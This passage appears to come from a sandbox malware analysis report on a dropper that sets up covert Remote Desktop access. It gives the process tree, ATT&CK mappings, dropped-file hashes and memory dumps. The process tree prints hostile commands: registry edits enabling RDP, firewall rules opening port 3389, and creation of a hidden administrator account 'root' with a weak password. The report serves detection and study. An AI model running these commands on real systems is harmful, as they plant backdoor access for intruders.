        
        C:\ProgramData\RDP\RDPWrapper.exe
        
        "C:\ProgramData\RDP\RDPWrapper.exe" -p27852786784527827414245258638727424524124452741245527212
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2024
        
        C:\ProgramData\RDP\run.exe
        
        "C:\ProgramData\RDP\run.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RDP\run.bat" "
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3168
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2792
        
        C:\Windows\SysWOW64\net.exe
        
        net user root /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1688
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1268
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3392
        
        C:\Windows\SysWOW64\net.exe
        
        net user root 12345
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3308
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root 12345
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
        10⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:1456
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -i -o
        10⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1564
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:100
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:696

C:\ProgramData\CardWindows\CDevice.exe
C:\ProgramData\CardWindows\CDevice.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3332
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1872
- - C:\ProgramData\CardWindows\sysdevices.exe
    C:\ProgramData\CardWindows\sysdevices.exe /tray
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: SetClipboardViewer
    PID:1696
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe /tray
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3716

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\ProgramData\CardWindows\Builder2.exe

Filesize
154KB

MD5
2f9404a1546b74fa36fd3f29e026240c

SHA1
e52498e70014a1411dd824faa6ac242a8174e8d5

SHA256
8c3380b859808f262b3b2b50784a6df4787a494def2798f04551df76bf54db5c

SHA512
a0000a04a2bc05e5d4472ae03dea797a1a666965eccbfa2db3a96b199c1ccc1071f8104398ae6ad57a39e97b163e07171e587ee1e5203b40646ab2d8e3641106

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
1.8MB

MD5
d72d6920de3d805ae296d1eb546fda02

SHA1
cc64201ba895902ef597d232138838c80c5d88d1

SHA256
ace233bd79a1bed3cb78bc0036690583bf1a81b177299ed02c503fac4c3e9cdd

SHA512
b8bf5ceb62f376f9ae443159cbdad6d01b213031e2ffc220649153e8a8ec2524dc28f829012b58f049a3eccdeba7860d89910daa0fb608ee71f416f2dcf07d39

Download Submit
C:\ProgramData\CardWindows\RDP.exe

Filesize
1.8MB

MD5
06500c519e9a20c6851d55e4ec6a1bff

SHA1
d09baa50160cd02e31f3f617ea24e1f655dd67cb

SHA256
3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

SHA512
217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

Download Submit
C:\ProgramData\CardWindows\Russian.lg

Filesize
48KB

MD5
e44e34bc285b709f08f967325d9c8be1

SHA1
e73f05c6a980ec9d006930c5343955f89579b409

SHA256
1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

SHA512
576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

Download Submit
C:\ProgramData\CardWindows\SysInstall.bat

Filesize
1KB

MD5
a00d1b7d978dcd3728e14c3f0e2386df

SHA1
596deee85bd6521c9d3fb7ffe3654aa0b386e9ed

SHA256
00baf3f49d72d9ae56cd5dbfbcd0a3a87b88ae3e768cbfe8a77769fd443a1cd5

SHA512
fe8a3752ba3bfddeb979f0a3cb8787218525057b873481f24169c6629851f862059ceb1cc52ed03f6b1bea87866833a107226b6a1a5ab969b959de0d56987c80

Download Submit
C:\ProgramData\CardWindows\SysInstall2.bat

Filesize
269B

MD5
ad964d1f40f1ab48e26d9ff0bdc01d06

SHA1
073396d19000036396005d9ebf89f40fb481e1e5

SHA256
632b75ab4857c964f8cf1f61efeff7a1bc7583fca3e9fbef9bca768ee227b9ff

SHA512
f671e8bcb42f757d5384c8be7bde6abe18a1196834948ded0634152c4ef0608c972be417082035b7640178d26810fe8dc25b128c1e18d1d343e1b9f9c475d255

Download Submit
C:\ProgramData\CardWindows\SystemCard.dat

Filesize
647B

MD5
2db0f5ade581516ccd80880197a007ff

SHA1
9dd8379da351d1c8361169d0548a25ad13c14973

SHA256
9b0e0a3cd2e3694bfa85335d8ec3b59a6e92bd37592604a65e32b310b61458d3

SHA512
8fffa0271c81cfd37194e2b405c2b35e949b08eec08e93be5b49d268d9ec4b58aaa9c5038b316589c5ac6444fb969b37a17c71ed8b1665dc3ca56f30b857c103

Download Submit
C:\ProgramData\CardWindows\WinDevInstall.exe

Filesize
6.4MB

MD5
33f6a4ac5579f90e922133688e63aec5

SHA1
d4be64a1d028942b41565ef11b4fc89e29ec29c2

SHA256
52d404ea9e55ca686af6fc07cefd56e8f83a728109145d92842782999505f38a

SHA512
f711b4d5bcac8f9a377dd036834f8146a75021d236405e38e4369c912bb377d011790795e18044267e1f7eb2daa807bff35298dfddcab164e8086644bbdd9f65

Download Submit
C:\ProgramData\CardWindows\WinUpdate.exe

Filesize
4.2MB

MD5
06453777004fb5230908f0e685994b82

SHA1
84febca11f852a8743f43cc0e6800b9a42837c4a

SHA256
7711ff56bc0b3d0b7699a6bf55cdb82bc99075375ec3ba0054974508f232faf6

SHA512
93fcd9aa358b6473e1a7c3fa791b150eaf05dd5270bb09844c0cbcf7a058ba2dcd6c71664b637df222bd9c087b1fd10ad19fcf081fc3437fe74c2d78646e7579

Download Submit
C:\ProgramData\CardWindows\WinUpdate1.exe

Filesize
158KB

MD5
a87f9f2ec81f6e06092bc89c52953b32

SHA1
c6b44dc646f26b6c896eb528d5caee0fd2a24061

SHA256
8696215c45e4c49aab4c819181efb2201216dadadcb764572a3f1ecbcd3a41ed

SHA512
b77fee6c4b45d9383d2989b82edd1b2d2a218bf48013339d91738a244b2ee4d9ac468c70d1b558252324d43d6bd51955da859531a3cbc9e3f3b5eda9a46fcbbd

Download Submit
C:\ProgramData\CardWindows\config_set.reg

Filesize
12KB

MD5
7335428a17c58c550a3cac2e1e60fdfb

SHA1
62e6f6d3917660ca320ae78e0d9893c41592417d

SHA256
2f2c82b0a2ca9b358ead399799620fac240bdb2eca8fdc4f5a79c85daecd88c9

SHA512
5013623fe1691d45ebb073b76db2c00a396961b201efb4c840c8984e2613b77204c061a6add1a0e5f7741cbd8078c7ec4dfb9f1a028abef94c38ea21ac5ade05

Download Submit
C:\ProgramData\CardWindows\start.exe

Filesize
154KB

MD5
dc9f7f087a52cccbfca60aa59f389f9e

SHA1
4a747d3ebf91d11cf1cb282b23cdf5e6cfbdc283

SHA256
53858e39610891bae32f60ecee885de73eba50da6d5e1b9160ca6134e408fc03

SHA512
777180c3e5e0c723413ba6e6064fdad9dc7ceb8fc8653a46f33683c8e0eae531d0a5d86528e6562cf9218919fcfc2ea842e0f41a8fd910400fd6e480588985f1

Download Submit
C:\ProgramData\CardWindows\start1.exe

Filesize
154KB

MD5
d56be8efb222e9a40fe8e5486ac1c624

SHA1
53285b987182fb6b94bd41ad4c639336a4ff80cb

SHA256
df650b6ffa69ca42452c17e9dc7a82bf7cf3eea96cdb7c64329bbb68eb2fb88b

SHA512
904ef0ea1f3ea9aad9dfbffd79c4883852bb74494f9271bb5e19ee6b8fb8370ba3b01e8942aec5892b9855dddd40badd5e553324764c3ae19c229ad123d28f71

Download Submit
C:\ProgramData\CardWindows\sysdevices.exe

Filesize
1.5MB

MD5
37e6e6633bbd15cf1fe5cc12b8e65c5d

SHA1
ed29fc4a46bc5e080e769c811f6923b4f8d540a9

SHA256
921ca14bc3444a688b877474f4991a2ddcefb9f958559b7a29c083dd9acd2f30

SHA512
f8c9ad952be9724b92ffe357c9db5ef58bfb702121c33b37ed9867236afebbcda69248f6d5c8119c512e23f218422fc8932227b2faf7ed80804af7dbae2d24bb

Download Submit
C:\ProgramData\CardWindows\vp8decoder.dll

Filesize
378KB

MD5
d43fa82fab5337ce20ad14650085c5d9

SHA1
678aa092075ff65b6815ffc2d8fdc23af8425981

SHA256
c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b

SHA512
103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

Download Submit
C:\ProgramData\CardWindows\vp8encoder.dll

Filesize
1.6MB

MD5
dab4646806dfca6d0e0b4d80fa9209d6

SHA1
8244dfe22ec2090eee89dad103e6b2002059d16a

SHA256
cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587

SHA512
aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

Download Submit
C:\ProgramData\RDP\RDPWInst.exe

Filesize
1.3MB

MD5
9c257b1d15817a818a675749f0429130

SHA1
234d14da613c1420ea17de60ab8c3621d1599f6f

SHA256
b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

SHA512
b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

Download Submit
C:\ProgramData\RDP\RDPWrapper.exe

Filesize
1.6MB

MD5
e4814efdb3d6761683665c487a02ef2b

SHA1
ecd25ee74af98658000e36b90c58af628b6ab6b8

SHA256
5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

SHA512
982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

Download Submit
C:\ProgramData\RDP\RDPWrapper_run.exe

Filesize
368KB

MD5
35862d6de7d5f5a21a111f4e9c831839

SHA1
891e59e3a6798ac60ef333cdfb7969ef02a3e77c

SHA256
5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

SHA512
00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

Download Submit
C:\ProgramData\RDP\run.bat

Filesize
612B

MD5
4e6a1033e3c2f39db397d392fe0d7c77

SHA1
11526234cd216334902d51665529c2b9be7acc05

SHA256
2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4

SHA512
395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb

Download Submit
C:\ProgramData\RDP\run.exe

Filesize
368KB

MD5
c4f61801834172c1f1973e8791311340

SHA1
de48c219435feda6680c474b445c8f548441abc7

SHA256
c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

SHA512
8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
25920c6f980724cf8e6ca7828bec3c79

SHA1
8e12aeb7bbd24add82f8b99a1769a5f8149e2c3d

SHA256
ec04e2604825a9badfe4256e8407d3a1177edced31b3b1a28a26511e6eb4c5b1

SHA512
856688f588b650197772c871c55721ba33fcad1535de8cf2fd8ef47434224601fad710bb84ef997a70846d86c3ac643b330d1b966c5fe242ca0af334bb09caf3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
d7b89018f6cb32cfe9bd03e30ae5e540

SHA1
50b68d698c77754b27814fe43043cf3031a74aa0

SHA256
3e6e74895926c83ee208b7741491df34e83eca4852db69d488c3c2ad4edeede9

SHA512
26ca33d0041ca91f47a34178ee1da2317e96c67854ae15b480de11c4b73ccfdb01b23ff5110350796186fab6d3d4324a2c0705ac0c8b8a738f22c75d632f1900

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

Filesize
36B

MD5
8708699d2c73bed30a0a08d80f96d6d7

SHA1
684cb9d317146553e8c5269c8afb1539565f4f78

SHA256
a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

SHA512
38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
128KB

MD5
dddd741ab677bdac8dcd4fa0dda05da2

SHA1
69d328c70046029a1866fd440c3e4a63563200f9

SHA256
7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

SHA512
6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

Download Submit
memory/696-63-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/696-182-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/696-56-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/1564-177-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/1696-184-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/1696-185-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/1720-85-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1836-137-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1872-188-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/1872-160-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/1972-144-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/1972-142-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/2580-106-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3300-27-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/3332-196-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-150-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-230-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-223-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-220-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-213-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-205-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-201-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-189-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3332-186-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3396-200-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/3396-162-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/3396-187-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/3396-215-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/3396-207-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/3396-194-0x0000000000400000-0x00000000009B4000-memory.dmp

Filesize
5.7MB

Download
memory/3484-146-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3716-54-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3716-65-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/3796-163-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3796-148-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/3900-118-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/3900-114-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/4056-47-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/4056-61-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/5076-49-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/5076-44-0x0000000000840000-0x0000000000841000-memory.dmp

Filesize
4KB

Download
memory/5076-42-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download